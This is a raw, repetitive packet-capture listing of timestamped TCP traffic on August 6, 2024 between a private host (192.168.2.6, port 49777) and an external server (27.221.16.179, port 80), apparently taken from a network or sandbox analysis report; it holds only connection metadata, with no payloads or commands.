                                                                                                                                    Aug 6, 2024 10:30:21.837292910 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.837306023 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.837308884 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.837321997 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.837322950 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.837332010 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.837342024 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.837352991 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.837368965 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.837380886 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.837403059 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.837902069 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.837913036 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.837923050 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.837935925 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.837982893 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.838011980 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.838035107 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838047028 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838057041 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838073015 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838083982 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838090897 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.838093996 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838104963 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838114977 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838125944 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838129997 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.838129997 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.838135958 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838146925 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838157892 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838167906 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838179111 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838196993 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.838196993 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.838239908 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.838613033 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838623047 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838634968 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838644981 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838654995 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838670969 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838681936 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838687897 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.838691950 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838702917 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838712931 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838721037 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.838723898 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838733912 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838745117 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838756084 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838757992 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.838767052 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838778019 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838783026 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.838783026 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.838798046 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838824034 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.838824034 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.838902950 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838915110 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838926077 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838936090 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838946104 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838953018 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.838956118 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.838989019 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.839011908 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.839330912 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839342117 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839353085 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839364052 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839390039 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.839425087 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.839492083 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839503050 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839514017 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839524984 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839535952 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839536905 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.839546919 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839565039 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.839567900 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839577913 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839589119 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839603901 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839610100 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.839610100 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.839615107 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839626074 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839637041 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839648008 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.839648008 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839648008 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.839658976 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839668989 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839679003 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839689970 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839695930 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.839701891 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.839757919 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.839757919 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.841312885 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.841361046 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.841372967 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.841439009 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.841444969 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.841449976 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.841461897 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.841473103 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.841479063 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.841495037 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.895731926 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.944376945 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944397926 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944410086 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944418907 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944431067 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944442987 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944454908 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944459915 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.944510937 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.944540024 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944551945 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944571972 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944582939 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944585085 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.944616079 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944626093 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944636106 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944647074 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944657087 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944659948 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.944659948 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.944699049 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.944699049 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.944757938 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944770098 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944780111 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944791079 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944801092 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944812059 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944820881 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944830894 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944832087 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.944832087 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.944840908 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944854021 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944864035 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944869041 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.944870949 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944904089 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944914103 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944928885 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944940090 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944943905 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.944943905 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.944951057 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944961071 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944971085 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944981098 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.944989920 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945000887 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945010900 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945020914 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945024967 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.945024967 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.945030928 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945041895 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945053101 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945063114 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.945063114 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.945076942 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.945105076 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945116997 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945147991 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.945161104 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945173025 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945183039 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945194960 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945214987 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945214987 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.945214987 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.945225954 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945238113 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945247889 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945257902 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945291042 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.945368052 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.945455074 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945466042 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945476055 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945486069 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945497990 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945523977 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945532084 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.945534945 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945544958 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945555925 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945565939 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945597887 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.945612907 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.945780039 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945837975 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945848942 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945885897 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945888042 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.945898056 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945909023 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945919991 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.945929050 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.945979118 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.945990086 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.946002007 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.946018934 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.946029902 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.946037054 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.946041107 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.946052074 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:21.946079016 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:21.946114063 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.293932915 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.293952942 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.293971062 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.293981075 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.293992043 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294004917 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294024944 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.294074059 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.294102907 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294114113 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294123888 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294135094 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294174910 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.294203043 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.294401884 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294450998 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294462919 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294495106 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.294554949 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294625044 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.294641018 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294651985 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294661999 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294722080 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294734001 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294744015 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294744968 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.294755936 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294769049 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.294778109 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294795990 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294806004 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294816017 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294816971 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.294826984 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294856071 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.294933081 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.294958115 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294969082 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294980049 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.294990063 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295001984 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295012951 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295017958 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295042992 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295044899 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.295053959 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295063972 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295073986 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295084000 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.295084000 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.295087099 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295131922 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295139074 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.295139074 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.295171976 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295181990 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295192957 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295202971 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295213938 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.295219898 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295232058 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295243025 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295255899 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295257092 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.295257092 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.295300961 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.295301914 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295312881 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295319080 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295329094 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295356989 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.295408010 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295418978 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295471907 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.295483112 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295492887 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295504093 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295515060 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295526028 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295536041 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:22.295542955 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:22.295542955 CEST4977780192.168.2.627.221.16.179
